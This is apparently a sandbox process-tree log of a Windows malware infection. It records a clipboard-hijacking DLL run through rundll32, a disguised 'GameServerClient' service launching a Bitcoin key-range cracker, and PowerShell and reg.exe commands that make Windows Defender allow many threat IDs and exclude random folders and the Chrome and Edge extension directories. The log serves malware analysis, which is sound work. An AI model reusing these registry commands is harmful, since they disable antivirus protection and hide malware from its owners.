                                                                                                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                                                                                  2⤵
                                                                                                                                    PID:2512
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2296 -ip 2296
                                                                                                                                  1⤵
                                                                                                                                    PID:680
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4444 -ip 4444
                                                                                                                                    1⤵
                                                                                                                                      PID:996
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2824 -ip 2824
                                                                                                                                      1⤵
                                                                                                                                        PID:424
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1704 -ip 1704
                                                                                                                                        1⤵
                                                                                                                                          PID:1544
                                                                                                                                        • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                          "C:\Program Files (x86)\GameServerClient\GameService.exe"
                                                                                                                                          1⤵
                                                                                                                                            PID:4824
                                                                                                                                            • C:\Program Files (x86)\GameServerClient\GameServerClient.exe
                                                                                                                                              "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
                                                                                                                                              2⤵
                                                                                                                                                PID:2792
                                                                                                                                                • C:\Windows\Temp\857158.exe
                                                                                                                                                  "C:\Windows\Temp\857158.exe" --list-devices
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2752
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 352 -ip 352
                                                                                                                                                1⤵
                                                                                                                                                  PID:4936
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 872 -ip 872
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3316
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2840
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2660
                                                                                                                                                      • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                        "C:\Program Files (x86)\GameServerClient\GameService.exe"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2144
                                                                                                                                                          • C:\Program Files (x86)\GameServerClient\GameServerClientC.exe
                                                                                                                                                            "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1696
                                                                                                                                                              • C:\Windows\Temp\428336.exe
                                                                                                                                                                "C:\Windows\Temp\428336.exe" --coin BTC -m ADDRESSES -t 0 --range 3399ae0aaa0000000:3399ae0aac0000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1800
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2292 -ip 2292
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4932
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\Jkgzmof.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\Jkgzmof.exe em /Ivsite_idWNU 385118 /S
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1488
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2692
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5836
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5852
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5960
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6096
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:6112
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:6136
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:248
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4008
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5180
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5288
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5356
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5628
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5528
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:908
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5956
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4336
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:6100
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:6136
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2012
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5224
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5200
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5288
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:2704
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2932
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1796
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2072
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5400
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5052
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4284
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3020
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1320
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:5692
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5716
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1760
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4828
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5656
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4948
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5736
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6132
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:1116
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1704
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3500
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:3604
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:3400
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4324
